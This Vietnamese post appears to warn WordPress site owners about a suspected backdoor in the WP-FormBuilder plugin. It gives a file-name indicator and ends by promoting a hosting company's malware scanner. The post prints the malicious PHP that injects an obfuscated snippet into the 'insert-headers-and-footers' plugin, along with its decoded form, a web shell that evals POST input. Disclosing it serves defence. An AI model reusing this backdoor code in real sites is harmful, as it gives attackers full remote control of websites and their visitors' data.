[Waring] Nghi Vấn BackDoor Trên WP-FormBuilder

Chào mọi người, cuối tuần ngồi lướt facebook mình thấy có bài viết CẢNH BÁO: NGHI VẤN BACKDOOR TRÊN WP-FormBuilder cũng khá hay và đọc kỹ thấy cũng nguy hiểm với những trang buôn bán, rất dễ bị tin tặc tấn công kiểm soát ngân hàng khi người dùng mua bán trên trang.

⚠️ Dấu hiệu: Nếu thấy file' wp-codiey.php' trong folder plugin, website bạn đã dính backdoor. File này nhìn bình thường nhưng có khả năng inject mã độc chiếm toàn quyền kiểm soát website. Thoạt nhìn nội dung file trông hoàn toàn bình thường, nhưng nó sẽ inject 1 đoạn code custom code vào plugin "insert-headers-and-footers" để chèn mã độc vào tất cả các trang của website:

function updateSnippets()
{
    require_once WP_PLUGIN_DIR . "/insert-headers-and-footers/includes/class-wpcode-generator.php";
    $new_snippet = new WPCode_Snippet((int)$_GET["id"]);
    $new_snippet->active = true;
    $new_snippet->location = 'everywhere';
    $new_snippet->auto_insert = 1;
    $new_snippet->code_type = 'php';
    $new_snippet->tags = array();
    $new_snippet->code = hex2bin(base64_decode(str_replace("vxsafAS*vasjw","",'Njk2NjIwMjg2OTczNzM2NTc0MjgyNDVmNTA0vxsafAS*vasjwZjUzNTQ1YjI3NjY3NDcwMjc1ZDI5Mjk3YjBhMjAyMDIwMjA2NTc2NjE2YzI4NDA2ODY1NzgzMjYyNjk2ZTI4MjQ1ZjvxsafAS*vasjwUwNGY1MzU0NWIyNzY2NzQ3MDI3NWQyOTI5M2IwYTIwvxsafAS*vasjwMjAyMDIwNjU3ODY5NzQyODI5M2IwYTdk')));
    $new_snippet->save();
}

Decode ra kết quả như sau:

if (isset($_POST['ftp'])){
    eval(@hex2bin($_POST['ftp']));
    exit();
}

Nếu anh em từng gặp case tương tự (plugin bị cấy mã độc, backdoor kiểu này), chia sẻ thêm ở comment để mọi người có thêm góc nhìn với nhé

p/s: detect mã độc tinh vi này bằng tool Vietnix Malware Scanner - Công cụ scan mã độc bằng Machine Learning sắp tới sẽ được release chính thức trên các cụm Hosting của Vietnix.